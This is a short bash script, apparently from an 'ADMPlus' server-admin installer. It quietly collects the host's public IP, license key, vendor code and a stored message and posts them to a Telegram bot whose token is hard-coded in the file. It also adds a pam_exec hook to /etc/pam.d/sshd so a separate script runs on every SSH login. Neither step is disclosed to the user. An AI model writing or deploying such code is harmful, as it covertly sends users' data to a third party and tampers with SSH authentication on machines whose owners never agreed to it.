#!/bin/bash
TOKEN="1830099891:AAF7NVl2kT4UBrXACSLW-7TUBwKvyEhuI8g"
ID="553561525"
IP=$(curl -sSL "https://api.ipify.org")
MSJ=$(cat /etc/newadm/message.txt)
key=$(cat /etc/newadm/key.txt)
ver=$(cat /etc/ger-frm/version.txt)
vend=$(cat /usr/bin/vendor_code)
MENSAJE=`echo -e "ADMPlus Instalado ${ver}: en IP: ${IP} KeyUsada: ${key} IPVendedor: ${vend} Mensaje: ${MSJ}`
#MENSAJE="$IP Usada"
URL="https://api.telegram.org/bot$TOKEN/sendMessage"
#Verif= https://api.telegram.org/bot$TOKEN/getUpdates
if cat /etc/pam.d/sshd | grep notify-on-ssh-login.sh &> /dev/null; then
echo "" &> /dev/null
else
echo "session    optional     pam_exec.so  /usr/local/bin/notify-on-ssh-login.sh" >> /etc/pam.d/sshd
#sudo touch /etc/ssh/login-notify.sh
#cat > /usr/local/bin/notify-on-ssh-login.sh <<EOF
##!/bin/sh
#
#if [ "$PAM_TYPE" != "close_session" ]; then
#  host="`hostname`"
#  message="SSH Login: $PAM_USER from $PAM_RHOST on $host"
#  DISPLAY=:0 /usr/games/xcowsay "$message"&
#fi
#EOF
#sudo chmod +x /etc/ssh/login-notify.sh
fi
curl -s -X POST $URL -d chat_id=$ID -d text="$MENSAJE" #&> /dev/null
